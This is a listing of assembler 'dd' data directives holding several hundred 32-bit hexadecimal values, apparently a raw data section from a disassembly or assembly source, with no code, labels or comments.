		dd 45A3B591h, 57E98D68h, 0B81FD999h, 109C13Eh, 607C8C63h
		dd 0DB72C2E7h, 0E9AB1ACBh, 8F7C7C14h, 0D8CE1DA2h, 0F2C964Fh
		dd 0E8FA395Bh, 70F59166h, 4E2FD920h, 89E8EC69h,	1A8C3787h
		dd 0F9EA55EDh, 7EB7D7D9h, 5FDE39F3h, 2CD2CBBAh,	4DB15287h
		dd 0E01E3310h, 964D9D97h, 80B483D8h, 0B94F45E8h, 204A53A7h
		dd 0A863B2F1h, 0A49BFDF7h, 9153A7ACh, 0E94FF4C4h, 7F095DBh
		dd 0EF840934h, 0A2F747C0h, 893D8D8Dh, 0DA312A0Eh, 0E8C047EBh
		dd 0B12A7EF1h, 4DA3F6A7h, 0F4412ACDh, 0B7C2F72Ah, 24887837h
		dd 7FA5DFD0h, 4FCAB204h, 0D9D1B725h, 0AA7FD154h, 955F0F31h
		dd 0B25927B4h, 364C2543h, 72D167B5h, 0F83B9DA5h, 0D80F4C8Bh
		dd 0F866C8Ch, 4524C731h, 0A2F20FE5h, 272D061Ch,	0FA2DDADBh
		dd 17FAFEEEh, 0D2964C4Ch, 0AE5EEF22h, 7EB20B4Bh, 28288B8Dh
		dd 26655E7Ch, 7632B86Bh, 90668A44h, 413A116Eh, 92D0C0B4h
		dd 0D1C4519Dh, 0F8C7A994h, 3B67DE5h, 99A1AA13h,	1857898Eh
		dd 45E006F0h, 98987A0Eh, 93C5F8A8h, 4F1E79E5h, 41EA797Dh
		dd 0B501AD7Eh, 98828DA3h, 2995F6DDh, 0B192A938h, 779B395Ch
		dd 38AA0210h, 677A129Ah, 0D3CAF1FBh, 46A62D72h,	0AFAB3F9h
		dd 0FC2BC2AEh, 0D6E51CA2h, 0F387A00Ah, 0C94C2085h, 640EEDC8h
		dd 689C2E23h, 791E8BF4h, 8846A344h, 655256AEh, 0D0FCA643h
		dd 0B2BB24ABh, 5F1A313Bh, 9FE20214h, 0A1202BCh,	0D521BA9Dh
		dd 8AE5C22Eh, 8C7296CBh, 0F3C28EA0h, 0C8954DC1h, 0CE59DF89h
		dd 79B773EEh, 86253029h, 89775A0Eh, 844A43C5h, 99E7CE8Ah
		dd 9A33E205h, 0AB192D51h, 0E7573307h, 0A6DE1C3Bh, 56FF8170h
		dd 2AD175A9h, 0FBB6A90Dh, 4A323EDCh, 8F1D0E87h,	557A2255h
		dd 0F44182C2h, 0CAFCDEA4h, 0C7D000FAh, 41A62556h, 875E9AB8h
		dd 4DEDBA2Bh, 0E2598628h, 0C57F8E43h, 3F1C1B6Dh, 7C17E77Bh
		dd 2E8DBE09h, 0C6BDCB1Dh, 79CCE67Dh, 21E251D8h,	0E11D9430h
		dd 0FD20EF41h, 68AB23ADh, 54001474h, 555C06Ah, 6739E3D9h
		dd 91ABF8CCh, 3E89497Dh, 0E72DF7CAh, 381A9DDEh,	5E01333h
		dd 0B12DBDF7h, 0F8EAFF5h, 5D2A391Ch, 0F0BFA90h,	84EB2C07h
		dd 9C318CEh, 43A4ED99h,	793E651Dh, 7FC7F06Ah, 27756921h
		dd 671DD289h, 7F2A0BB2h, 0EB775D48h, 42DB05B8h,	7FE6B44Fh
		dd 0B8EA9A19h, 5014DEE6h, 2B235CEAh, 4B96CAB6h,	793096D5h
		dd 1849CFF0h, 0AB0F8C2Bh, 0E399849Dh, 3D538362h, 0F9DDEC5Bh
		dd 6F03B468h, 573C380Dh, 0F67CC3C7h, 0BF3A5D45h, 0D54CED87h
		dd 25D7BC44h, 12A6A3BAh, 0D67980EBh, 0F1C9BAFDh, 0D978C97h
		dd 0BCA3B6CBh, 0A176F3AEh, 0C7A1AC9h, 0A14325CFh, 0F81A15ABh
		dd 70E1F13Ah, 4386F3CCh, 0A912146Dh, 0FE7A504h,	43D7158Ch
		dd 0DAB439C4h, 57A10EFBh, 0ADBCCA0Eh, 2F5B9463h, 387240BEh
		dd 0B2CA3777h, 1B451935h, 0E885F130h, 9113BAEEh, 913AB529h
		dd 0D7D92BBh, 0DA52753Ah, 2C7E5659h, 5E498C70h,	93D3AD2Ah
		dd 564B07Eh, 459E6E54h,	0CAD770DBh, 0D7E4B3E0h,	0F8BAE573h
		dd 8CFF4138h, 0FEEC768Eh, 8B43B19h, 3D76D31Dh, 496BA85Ah
		dd 0BACF0E9Eh, 0F8842A3h, 667C444Eh, 0A6EA2FDh,	0D42D0C50h
		dd 43465D59h, 5504125Fh, 0AD1D043Eh, 5D3A55C0h,	87AA695Ch
		dd 438AC450h, 0A2AC6AB4h, 0DCABAC45h, 49AE8B9Eh, 703914ADh
		dd 2AF1317Ah, 1FDCFFE3h, 0AE6EA695h, 0A968363Ah, 0A3D377F3h
		dd 450797D3h, 527DE568h, 80C72BC5h, 7BBB4949h, 3D5185D5h
		dd 7E2B3CFFh, 0B2907E47h, 0DFFD14B7h, 5C7C68F3h, 0FB9692E9h
		dd 0AA411435h, 0CCB3267Ch, 71CC892Ch, 561F736Eh, 7719D7A7h
		dd 0B6C587E4h, 6BB731B1h, 223F5046h, 9DAE3594h,	2893DB69h
		dd 0A2EC7A56h, 0AABA38AFh, 0AB907AB5h, 0D1443795h, 64DBE5Bh
		dd 0CB5DBD93h, 0A8111A0Bh, 0FE7F687Fh, 6A8761D9h, 0FBB6574Bh
		dd 0D089E02Eh, 5118A625h, 73AC499Ch, 97CA4963h,	30F00F17h
		dd 951CF84Ah, 52BAF0C5h, 45D506CFh, 0C4DF0B29h,	9DF362E5h
		dd 0F47F36AAh, 2C2BB41Ah, 255F49C4h, 0CAC64206h, 92A090C9h
		dd 1E508864h, 9737F29Ch, 0DEEB2FB4h, 0B10EB32Bh, 3DE3DE94h
		dd 980B9E0Bh, 4BA75002h, 0E75464Ah, 1BFBED2Ah, 3B2B0B8Dh
		dd 8B87E07Bh, 0B352C55Fh, 0E9AA786Eh, 0CCA7DADAh, 3E129C09h
		dd 58C058F2h, 0B1E7D0CDh, 9A452BDCh, 8ED6917Bh,	9EA334DDh
		dd 0B6A5450Fh, 0B2925D4Fh, 975EF2BCh, 3CF77C74h, 0A08A3A1Eh
		dd 0C1E5F9FFh, 730F35A1h, 0D9AB5CB5h, 0CAAF5163h, 0CCD7586Ch
		dd 366D8A5h, 10AB1DA6h,	0B44F0D5Fh, 0F933591Ch,	0FE7EE2DDh
		dd 0FC735CA0h, 4E582325h, 0AC4C7A64h, 0FDD60610h, 7BB5B88Ah
		dd 0A0E6D08Dh, 343AE8Fh, 496B4E7Dh, 0D511F474h,	0E96C5386h
		dd 0D65D546Ah, 1762319Dh, 3DD5CF85h, 81A1B1BAh,	0CEF9E9F4h
		dd 289B5F57h, 8B322159h, 0C62ED255h, 0F835BB9Eh, 515008D3h
		dd 495F5E35h, 0EDDB6B4Dh, 0C5B5EF2Eh, 314A73EBh, 0A75A7BEEh
		dd 6847DF09h, 4491F49h,	61EBBF1Dh, 55A2FFE5h, 19958DD8h
		dd 928CFC03h, 0ED9531DEh, 916C6814h, 6B004F04h,	4F325920h
		dd 7DBDE540h, 7A1A8C60h, 0B4FCAEA4h, 10B65FBDh,	16F94CEDh
		dd 3EB8F86Eh, 4C0975B3h, 8B495BD5h, 6170B96Bh, 365C4AEFh
		dd 0F0F085FFh, 0C537954Ah, 50D16545h, 6D23E13Eh, 53F9B6E9h
		dd 95E8DC35h, 0BEDEEAE7h, 7A18BAC2h, 43566558h,	0EE4FB30Ah
		dd 0C78F2EE2h, 7781C95Dh, 617BBD32h, 0E52CE15Fh, 0CD61DD1Ah
		dd 7ABE2AADh, 759A2E9Eh, 0A75FAA90h, 4642BC2Eh,	0C37A9B5Bh
		dd 0B43BA2A6h, 503FF50Bh, 0EB8B58B5h, 8C45C44Fh, 9B67F8B3h
		dd 10943476h, 0A04E4780h, 155429DDh, 2386A1B9h,	0F91E4452h
		dd 0F7B1DC48h, 17DCD8CBh, 7D8A9DD9h, 92CACA82h,	95FBB695h
		dd 0DB11157Eh, 0C46F1336h, 9BA455D3h, 43F48E41h, 0A0718BAFh
		dd 0A7B422E4h, 574F56D2h, 57D5185Fh, 71A266EBh,	1155C38Ah
		dd 0BA344DBEh, 2D74E5B8h, 95904E5Ah, 4FA32ED7h,	32ECFB75h
		dd 0D1AFDA54h, 0ADAECD4Ah, 20D5CA4Ah, 0DF5A72E4h, 581F524Eh
		dd 0EB4B77A0h, 0EF523D23h, 0B72E245Fh, 0D085BA61h, 66AAFD18h
		dd 967691BAh, 0EFAB4A09h, 53C07FCFh, 0F0FD6D5Dh, 1E43B907h
		dd 1BA399A0h, 9AF0E07Eh, 207E5215h, 0E881AFF7h,	0F95CEB6Ah
		dd 0D2B28638h, 0F3A83FDCh, 0CF9746Ah, 9BE255ADh, 0A9B7114Ah
		dd 30090E44h, 4B17985Bh, 4D140CB4h, 8CCD53E9h, 0D439861Fh
		dd 0A4931159h, 168D126Fh, 0CA09222h, 5C41E65Eh,	87C57ED0h
		dd 20C3FF44h, 65ECBE7Dh, 513FE959h, 0A607C1D3h,	0EBF7BEEEh
		dd 0DAAFE7CFh, 0F4BA15BFh, 2A2A0365h, 0E10FF88Fh, 0B261F426h
		dd 7692C07Bh, 0D731A133h, 44A1CBC3h, 1A1D0B7Dh,	9CB4BA7Ah
		dd 1B60EEA5h, 4E2B52E5h
		dd 69729925h, 0F74B8A1h, 642C5BC5h, 40369A15h, 31BCF228h
		dd 0BA6CD03Dh, 0EEE71982h, 0B5DEED0Bh, 3521317Eh, 0F5220268h
		dd 56BCAA69h, 1BE4A9C3h, 0A8BB8B45h, 0AB6660D2h, 90C4DD5Ah
		dd 0E4BA545Bh, 463A922h, 4E9A032Dh, 0DBE9149Eh,	0F0931B6Dh
		dd 8E993585h, 0FD68B761h, 525779FEh, 71EF9857h,	0A6651733h
		dd 8D33FE42h, 9FEDEBD6h, 4611F274h, 12209CA6h, 7850A626h
		dd 0E593E8CEh, 0C593C0FBh, 0A3BA350h, 0F3E94BEDh, 0DC43D2F2h
		dd 12565965h, 0C4DD2BFh, 0FAE38670h, 0F639295h,	0E0617DACh
		dd 945F9FCBh, 0F9883825h, 0EAFFAC15h, 951332B9h, 2E242FDDh
		dd 0BA8E563Eh, 4D89F786h, 699F0DF4h, 2DC159FDh,	5905E9D3h
		dd 6FD4BDF5h, 93345EB2h, 0E8931D55h, 0E737D2Eh,	0D97C4409h
		dd 0A5E75CB7h, 2FD60B2Ch, 0BF938FD1h, 0A960A5FCh, 206C0059h
		dd 0CF04DDF3h, 2DFE714Eh, 86CAE746h, 4B7F9C29h,	0F92DFB50h
		dd 8959A76Bh, 0F85717D9h, 0E2EC2915h, 0DA528E6Bh, 18AA6B9Eh
		dd 95A619C3h, 0D8C43439h, 0D19CB04Bh, 0C9536BD5h, 8164AAD4h
		dd 8D5B45CCh, 0E16AB2A4h, 234EEBD7h, 0D920BB5Bh, 0E7CF67B2h
		dd 48C0E617h, 0A834EFBEh, 9185185Bh, 0AB4C892Bh, 0CECC097Dh
		dd 0C8FA0ADDh, 502FCF13h, 12D32B6Bh, 134FF85Eh,	520FA5D2h
		dd 0F0E9371Dh, 5B9A4B62h, 117B74B9h, 0A63F85CBh, 65D2C0F8h
		dd 0EE88BCC5h, 0FD3D44Eh, 0E67CF7D6h, 81DDC568h, 607C89DAh
		dd 0A4B153BDh, 0AFBD689h, 0F049752Dh, 7F168B9Bh, 0D4594464h
		dd 1A1B2B49h, 83F4845h,	0B43922FBh, 7D3532B2h, 0AD6848F1h
		dd 0F27482D2h, 8B7ED611h, 0BC2F968Fh, 7121EA33h, 309FCE86h
		dd 0CA2EBE10h, 56E242ACh, 2E0D9717h, 0BAA6F6D4h, 0A50CA3C0h
		dd 0C7085D59h, 4F55BF14h, 0B3E51407h, 0C4D87D9Dh, 0DA0CF5B1h
		dd 0BF1ED42Ch, 0D23E742Ch, 793ABF3Ah, 405D8453h, 5A2B7C28h
		dd 1F806116h, 560374FEh, 0EE7FD5EDh, 13480BAAh,	73860956h
		dd 35542F0Bh, 90BF51B4h, 5C990E77h, 51E6CF3Bh, 1A24EEDDh
		dd 0AAE4365Ah, 54E8BD55h, 0A32692EFh, 56E34B44h, 8B4BD273h
		dd 2A30CEBCh, 0BC3FCE4Fh, 0C5AA5684h, 45F01BC9h, 0EB6DF694h
		dd 8E03F2BCh, 418F563Dh, 0F5196D88h, 0A09F6F8h,	0DD083023h
		dd 2AB74707h, 0A452C0F0h, 639EFD35h, 0DAE6799Fh, 78161334h
		dd 7BCBA41Fh, 0CA5D7FCh, 724CAF4Eh, 0CB35F757h,	87387F9Fh
		dd 0DFFE4FB8h, 0B3A1A5AEh, 5D725094h, 1755F135h, 0FBF1AEA9h
		dd 90C3B7A2h, 94568279h, 0D53DDEF4h, 0F1C52445h, 0A7AF1ADFh
		dd 9AB8C79Ch, 2D235704h, 0DFD63291h, 0F092246h,	0B3749968h
		dd 9C969D0Dh, 0E266E1AFh, 0FA095CE9h, 5D064734h, 0AA9FCDC7h
		dd 343FE625h, 49A243F1h, 0A5E503A9h, 1BBB8315h,	7DCC585Fh
		dd 9BAB43B9h, 4B9BE558h, 0F7C06E18h, 546AA633h,	1F86F263h
		dd 957B8C76h, 7BDADB6Eh, 8D256827h, 81C5CA96h, 2261983Fh
		dd 0D0D0BC88h, 0AF960977h, 0AF6BAF2h, 0F85C2657h, 5B4F1687h
		dd 54684646h, 140B6663h, 0D1F40F3Bh, 1EDAADF2h,	0BBCEAEB3h
		dd 0E4BB1F92h, 74155AF2h, 41C091D5h, 3A8B7BEDh,	0EAEF2B6h
		dd 3B7A0CA3h, 8F6E6467h, 0F589FBDAh, 5D4BE78Fh,	0F6086D19h
		dd 1AA67579h, 0EDDD51B7h, 73ADD9F5h, 0DBEAB977h, 39FA7952h
		dd 0A319AA49h, 978B57A5h, 0B7E55C0h, 0E80850EEh, 6C9D3669h
		dd 0DCB15463h, 356BD2D1h, 540BA8D6h, 5CC983C7h,	22032A07h
		dd 0FC737EA5h, 372CCC6Ah, 3D2DDB4h, 0A7C94C47h,	904339F6h
		dd 2A545576h, 89EC1C26h, 27436728h, 47307293h, 448D812Ah
		dd 0A5F15DDEh, 0D5749BEBh, 3F0BCED3h, 9EA670Eh,	65028B9Eh
		dd 36B4529Bh, 0A25A9A2Bh, 0E1BEAD5Bh, 0D015351Bh, 0D9E1F1A2h
		dd 3C0B3DA1h, 42D16CB7h, 311E0F9Dh, 0DABA62BBh,	2D55D6ECh
		dd 21C7C391h, 14720BF2h, 4A55A27Fh, 0D1575AF3h,	0D85F15C1h
		dd 0EB7DED71h, 0C5E76783h, 60D7632Ch, 0FA70C0F7h, 891FED11h
		dd 87A7CB0h, 0ECE5EDDDh, 0B7AD7FCFh, 5583CBFCh,	0EB393111h
		dd 1569131Ah, 0F2AE931Ah, 52964E2Ah, 2AD61BD4h,	0BFAAE625h
		dd 0A38911D5h, 3D18D839h, 1CD3FCF0h, 6D50C742h,	0FF1A3252h
		dd 2E01FC19h, 0B27BB45Dh, 0FB45AB6Eh, 2AC5D359h, 54657709h
		dd 8A053C59h, 0DDD455B4h, 7F61A6ABh, 33EFC61Ah,	269187E3h
		dd 0AA6FBC18h, 0F87E4A62h, 526A317Dh, 649F367Bh, 49EF7D09h
		dd 1E7ED1CCh, 556FB271h, 0FDB83B52h, 0BC186724h, 0DCC4EE37h
		dd 0BED5383Ah, 8BEFB604h, 33F9244Bh, 0A4B1B456h, 80246EFBh
		dd 9EC65258h, 6B50B147h, 0F3449745h, 8CA3FC04h,	0BC0BA75Eh
		dd 655DDC5h, 43456782h,	0A9F65142h, 0F496D904h,	4E1864AAh
		dd 0D3FF514Dh, 6BC357FDh, 1375BF1Eh, 0EF7EF22Eh, 0B22ED6B6h
		dd 80A3CDF1h, 2FE3A688h, 0A99A5A9Fh, 57EC319Dh,	4A603625h
		dd 0BDB108E9h, 0B4F96A99h, 37599981h, 33D4D84Ah, 38FB2530h
		dd 65F963C7h, 54DDC060h, 23577208h, 0DCC9E7B2h,	188063B0h
		dd 6F5211AAh, 0B3BF15A3h, 0F795D958h, 0E0A97E37h, 0BF8BAC7Ch
		dd 0F856FE4Ah, 0BE1A8940h, 9F358D82h, 0DF8B89F2h, 2CE82CD1h
		dd 0B2358B6Ah, 23FDA5F0h, 0F930FB89h, 94756EC8h, 0B6786B15h
		dd 0F5675280h, 974DF131h, 0BEFBC057h, 3F07552Eh, 783841A6h
		dd 4BDF8129h, 411F45B6h, 4FA4F059h, 218527Ah, 6A73AD85h
		dd 0B4D8EBCDh, 0A681F78Bh, 0C14DD9AAh, 1E449124h, 7FBB3BCh
		dd 87EB7F13h, 5883F484h, 0D1CD6E67h, 8DD6717h, 72D73B1Bh
		dd 701D3997h, 22FC8970h, 8E8A0304h, 55353419h, 8CD8FAAh
		dd 0C3F08ABEh, 0BB7ADCC6h, 17F55EB9h, 64514756h, 7444C0FFh
		dd 39EEAC4h, 1FC87DB4h,	9D9B1F8Ch, 884A9E0h, 0B6F43546h
		dd 0B72817D1h, 6E8EC6CAh, 0F63342F9h, 0FBA81D03h, 0A00AEA57h
		dd 0C3FADB95h, 0C9ED0FE8h, 0E078F16Ah, 6437F9ABh, 0C25659F8h
		dd 0CB587AC8h, 39509556h, 0EEDF943Fh, 0CFD1B446h, 7479CB33h
		dd 905545CAh, 0D95AAD29h, 5512B40Bh, 334CAC62h,	8BA89457h
		dd 4F202D14h, 0DCA76FE1h, 450DB7FDh, 0F8DD9355h, 9CB4CFAFh
		dd 546A42A7h, 0CA2A4077h, 770972B4h, 0E8263897h, 33E10357h
		dd 4BFC66D0h, 0EF3BFB7Eh, 3FF6E5A7h, 3C7032FCh,	0CDBC6751h
		dd 0EB66E6B3h, 0FCB6CBD0h, 6B1668ACh, 6A68AEE8h, 7622B57Fh
		dd 0CA5AD81Eh, 0A559F5F2h, 6B0C25DBh, 0F205918Ah, 0F44EF724h
		dd 8EFF48EAh, 0DD99FC9h, 0F88D663Ch, 62EA341Ah,	4409A79Ch
		dd 6462BE0Ch, 21C2FF3Ah, 7A4E7897h, 9952B9A9h, 0CEBD6AF6h
		dd 5FBABE26h, 98E0AA27h, 2EB9D231h, 0F477B2B6h,	0E7F63460h
		dd 0F68BBD9Fh, 8EF666B1h, 0FA6DC6B4h, 0D214556Ah, 170D22E0h
		dd 943E17ACh, 9794E67h,	0F1190B47h, 0DD24F663h,	9A4D1FE9h
		dd 8CABF9D0h, 0DFE92256h, 0ACABEDD7h, 64753EEDh, 6645A598h
		dd 2B77BB11h, 0B5DACB4Ch, 0D09D075Eh, 0DB68AFBFh, 0FC4590ECh
		dd 0C499BBF0h, 9ECE5AF0h, 4411587Ch, 0C5FCE14Ah, 53F5FB1Bh
		dd 2A769A62h, 0DB9FF1D8h, 12A98D17h, 6C699E53h,	30E60A9Fh
		dd 6A575D40h, 61F7DA25h, 9016540Ah, 0E08EB82h, 5627D8FDh
		dd 0F8701789h, 8802F02h, 0B6EB4AEAh, 995558F1h,	0BD5BB72Bh
		dd 208463Ah, 0AA2E9F8Ch, 42C8AFC7h, 0F9953120h,	0B57E356Fh
		dd 88908623h, 0F0ABA5B5h, 5D88C497h, 35A31389h,	50FB3992h
		dd 54F79345h, 7DF4FE6h,	69AAF8F6h, 0FB5B35E7h, 8F73A5F8h
		dd 678CCF4Dh, 0AC3F9F5Fh, 0E5349718h, 5A568549h, 0ABE6CA79h
		dd 6C6C455Bh, 2CE65C08h
		dd 0F4A2ED1h, 21DF6A30h, 0FC40C726h, 77E9B717h,	4447A5F3h
		dd 564F36EFh, 49339088h, 0EA4AAC23h, 0D2B87C50h, 673DCA41h
		dd 61EB071Eh, 7F391BE7h, 2971A464h, 0C9955F68h,	0A303F65Ah
		dd 47EE5FA8h, 0E9E7C182h, 0BE9EF42Ch, 60AF52E4h, 0DC6D7C0Fh
		dd 43F0BFC2h, 2EB1CADAh, 4621487h, 6CE1F523h, 0BCCC0D2Ch
		dd 5EC8C544h, 6F6E1ED1h, 0A17DC65Dh, 49D4C0C8h,	56EDE505h
		dd 4787C922h, 8D17A34Fh, 0ABBBB937h, 7FDCF1E8h,	0F2FADF69h
		dd 7B1ACAD9h, 0E96402ECh, 0BB6ABF65h, 0C5CFA541h, 0B0388DA1h
		dd 21DF871h, 3DFAABC4h,	0A7468178h, 22C9D7FBh, 0F0E144D2h
		dd 0B4168B1Fh, 3A82E1E6h, 3630B74Dh, 0CB60EEEFh, 0E5CAF1FEh
		dd 44126FA9h, 226B81B2h, 56FDE7CFh, 0A61B93ACh,	679C5954h
		dd 0D44AD760h, 901CEE4Ch, 2C1CB1DFh, 0EF3D747Ch, 2743C52Bh
		dd 38737E04h, 9C75B92Ch, 6B8C3E01h, 0F8FAA363h,	9AD16470h
		dd 0D1E7DE31h, 0F1D17CBh, 9764F5FEh, 291D4712h,	6D59D897h
		dd 0F83AFF86h, 8F260321h, 9E545471h, 0C834BAE3h, 7D37AEE2h
		dd 0D952E779h, 3E3C602Bh, 0E35045A5h, 85310F6Ah, 0D46DBB3Bh
		dd 1451D7DCh, 3C33120Ah, 9E987119h, 2BBA6ED7h, 0C0615FE3h
		dd 6EF25174h, 8E5F28DFh, 0DF62CAE9h, 0AE384A39h, 15189395h
		dd 62EB9C9h, 504312E8h,	8D25439Fh, 3FB995D6h, 0F3114405h
		dd 0FE10259Fh, 739A83B9h, 0D34DF568h, 455D6431h, 767A2C45h
		dd 60A4BF36h, 0C6CF09D1h, 0AD122DF7h, 0A4D17285h, 3AC748DEh
		dd 83967F4Fh, 148A97B3h, 69561DF4h, 0AFA2F944h,	6BB7DEB0h
		dd 795F5370h, 0BC45FE15h, 884AE632h, 0A6269636h, 0F4FEFD59h
		dd 5EAC85E8h, 0EAF6ECDBh, 0D95315EDh, 797F2DF7h, 82D4FC37h
		dd 2518B08Fh, 350AD2F0h, 0E04BCC4Ah, 0AE93D81h,	6B33A8B8h
		dd 390B7FEEh, 92B77D7h,	2EA5DE65h, 0D2C280BFh, 0FDDFE758h
		dd 965612A4h, 67A2AED3h, 71533DA0h, 0A916FA73h,	8D5DE2FCh
		dd 25AC9096h, 5846EE80h, 61C8F22Bh, 40EF1727h, 61788C5h
		dd 2F8AE3F8h, 0F4678C95h, 7B468752h, 0E211B6F4h, 9A6B72ACh
		dd 7FA42552h, 0B178AFCCh, 4E5979C4h, 275835DCh,	91CC7C65h
		dd 952C292Fh, 0BF10FBBh, 2EB2DA62h, 0CDCFA2D9h,	92BBE77h
		dd 79D6C9D4h, 0E2B6A84Bh, 0CD36AA62h, 0BDE607D1h, 0F1B5B5C7h
		dd 3067F9C3h, 0B5FDBB00h, 1304C62h, 9F23B541h, 853CFE38h
		dd 41CA83CDh, 684C8EDEh, 743537E7h, 5519C228h, 86E962C9h
		dd 71F4CA75h, 0C7875443h, 5844D7CEh, 0F69F316Eh, 0B81A892Ah
		dd 2DF243F0h, 7D6A4B43h, 0D1009A35h, 0B14A9D4Eh, 136EB65Fh
		dd 41240F05h, 0B9C4A53Ch, 0CBD6A6AEh, 5CCF2958h, 3792D7A2h
		dd 7DB09BF1h, 9A18B1E0h, 641F9043h, 18791BECh, 6D8CE942h
		dd 0B27C3591h, 9C16F5B2h, 0A1A1EA73h, 735A19A1h, 0D562131Dh
		dd 68E5A9AEh, 4FA142D5h, 641228CAh, 3D661A66h, 0AAF83EBBh
		dd 0A0467FC3h, 0BEAB3EE6h, 0DC251576h, 205FDA1h, 9260F9Fh
		dd 15187850h, 9BD5BEBAh, 0C3F2BF83h, 80F2A7EDh,	82905FCBh
		dd 0F82197C5h, 688F1AE0h, 0C2FA0331h, 2287A199h, 407E7FCDh
		dd 1B2F0CB5h, 10D7F876h, 7DEE0494h, 9A2E26A7h, 0E14FB36Ch
		dd 0C45445A2h, 4BB8BE4Bh, 0A948B5FFh, 5D8A0FC9h, 0AB641501h
		dd 4CCFCADh, 0B820F58Fh, 628FE194h, 4575AF9Bh, 89C13C94h
		dd 0F2B0005Ah, 206EF45Ah, 6BA9C8A0h, 0D1CBB6B3h, 0D82630B5h
		dd 0F729F03Eh, 5689A222h, 0EDC040EFh, 85E9DFD3h, 4F1C6836h
		dd 0B7CD300Ch, 83612FFDh, 0ECB85177h, 0D6618D92h, 0FC57945Ah
		dd 7C35F246h, 22509599h, 95FCF311h, 0F41BFC1Fh,	771BE86Fh
		dd 0E5272B23h, 0C948921Fh, 0E7678F8Bh, 0BC7C915Dh, 9FEE1746h
		dd 0FA0258D2h, 0D1399035h, 0A22A8D46h, 0A5C7EBF6h, 45FE8A89h
		dd 7E8F6C61h, 107B3F7Ch, 5AE29E06h, 21F8BC56h, 6471936Dh
		dd 0AE52852h, 0C50355CCh, 915D3FD3h, 35E87D28h,	0F77E04ACh
		dd 79779DC3h, 0AFD51523h, 0DC54E74h, 101CED1Eh,	8A956362h
		dd 0C23A7338h, 0D81871F1h, 38495BDEh, 0ED6B43E9h, 0E67C036Eh
		dd 0C8D4BC70h, 0DE2FB633h, 0A7D76FA3h, 0F2A0E23Bh, 0AAE1664Bh
		dd 0E479366Fh, 8926E942h, 0A65CD55Dh, 0AB2C95B9h, 607B6D33h
		dd 5779A2A2h, 250C6154h, 549EE0A3h, 8C90A887h, 0EBA4A2EAh
		dd 4C8505BFh, 0FB421956h, 0E36D0101h, 73218D3Eh, 2CA136E5h
		dd 0C09BF8E9h, 0A672E4C4h, 28C5B9D8h, 39B4A2FDh, 0FA8B873Fh
		dd 357244A0h, 91216B34h, 0C2D6A9D9h, 2749D4CAh,	85C61A2Ch
		dd 0D95F5CC9h, 0D10B02D4h, 628A1E32h, 8B19DD5Fh, 1F89F10Ch
		dd 176B340Eh, 3182816Bh, 0FD1F088Ch, 2914CB7h, 2FA6AAA5h
		dd 7FB40FE4h, 173DF0BBh, 1658249Ah, 0F5CDB915h,	32B3A49Eh
		dd 57BC121Fh, 0F7CC1F6Fh, 60DA188Bh, 937B43A4h,	0A0EDFB87h
		dd 0BCE8728Bh, 0A5687F7Eh, 6B901F16h, 0A57FF346h, 0D4808AD1h
		dd 33641221h, 0C076132Bh, 458C1094h, 0C52E3AF6h, 0BA755756h
		dd 0ED1E6794h, 42E43585h, 88117F4Bh, 38E7969Fh,	0AF9F555Dh
		dd 0CD73AACCh, 0F19C586Ch, 1F4BC12Eh, 1E3A33E6h, 917FBF9Ch
		dd 0A62FA85Ah, 0E3573339h, 0FB998B81h, 4A2CE238h, 0DE8973B5h
		dd 87F45570h, 91C40DDh,	0D1E17DEFh, 0B0D438FAh,	7B5F445h
		dd 64255996h, 3CB7FEC6h, 68085B88h, 0F377E180h,	0B73E9F7h
		dd 9C54852Ch, 42E0AB55h, 2BCA0158h, 72AE2355h, 9FE1A34Dh
		dd 4B213DAEh, 57FA89D3h, 5895C040h, 914022A0h, 0AAB5770Eh
		dd 5DDB8AE3h, 7D233584h, 0AAF62448h, 0A5CD3968h, 7379A930h
		dd 0E027AED6h, 0C39E0849h, 0FF75AD40h, 4CC790E2h, 60BFB683h
		dd 94FC2236h, 0D1079F0Fh, 0B5CAF09Fh, 0A37EC246h, 51A6B2A0h
		dd 46B2D6A1h, 0AC2B6FFh, 0E3F9C7F9h, 7B7570Fh, 0AB9051A8h
		dd 3DDE696Ah, 697C0D68h, 64DA5B27h, 14CF3F19h, 7D9AAB15h
		dd 0E4C182DAh, 0B73B11AEh, 27239A62h, 0B646EC82h, 0EF82D181h
		dd 0B3D57F9h, 0D0F2B619h, 9F1EF789h, 0ABE277F9h, 6836BF68h
		dd 0ADCB98C2h, 8E831386h, 0C5F51BE9h, 33EB165Fh, 8F0CB6F3h
		dd 0AAB38891h, 457BCEA4h, 4BA9C2D3h, 4AB37B4Ch,	2FCEF4D4h
		dd 9A372C06h, 27C7B5CEh, 4F7C6828h, 32D37B09h, 5F4B6594h
		dd 373D79A1h, 637BF4E0h, 253CE2B0h, 0CCFB7655h,	7F0C4A1Dh
		dd 5B9AF460h, 0D4ED0F2Fh, 1E28B557h, 10FCD1C7h,	501DE856h
		dd 4ABE461Eh, 3867DC8h,	8A97C0DAh, 4ACAEAE1h, 0B568E89Dh
		dd 0ACF95B4Fh, 452B7867h, 34E45DDEh, 0DC45E0BBh, 0CF2578A0h
		dd 0CC553C43h, 94FEA631h, 0E4A5714h, 0F951FC75h, 0A08B5392h
		dd 0BFEFD557h, 0D42D0D55h, 0C914D568h, 5427CDAAh, 0D3BFF319h
		dd 396F8FC7h, 4C8F0DA0h, 0BB74DF24h, 6C61F1BBh,	38EBF4C3h
		dd 0D62335F5h, 0CD0028EDh, 3515B289h, 0AE7B13A8h, 875A7128h
		dd 24B23754h, 0FED6D16Bh, 4EFDA89Eh, 0DA3C07EAh, 84EA28C6h
		dd 31489ACAh, 0FACD37EEh, 98FFFC68h, 0CB22A212h, 0A4D17573h
		dd 0B4D0CC59h, 0A7070A8Bh, 5880D6C8h, 0BF18C107h, 2160A54h
		dd 0D1F53E55h, 0F462FC17h, 0B8AA469Ch, 74B96B9Eh, 0F398AAC5h
		dd 0D92CA29h, 1DE33B0Dh, 0ED1EE7E7h, 0F1E2B51Dh, 0FC7E2DC3h
		dd 8DAC63F0h, 5340D164h, 0F4683CF5h, 0BA7236D6h, 62454C42h
		dd 45662B2Fh, 0F33FA35Eh, 658DF48Dh, 1F98C5BCh,	612F7DBCh
		dd 9D40C660h, 5AC01583h, 99E195B0h, 7130B3D5h, 52FAF2F1h
		dd 717420ECh, 29221E55h, 91FA3699h, 0E47BAD84h,	0EAE1542Fh
		dd 6BFBD1ACh, 5F89AF60h
		dd 0E5A4DBAAh, 5C49C289h, 894A37ECh, 1E3CD98Dh,	0BB1EB438h
		dd 115DDCB6h, 7063A433h, 6DABE6D0h, 0EFC030BDh,	0ECD52F0Dh
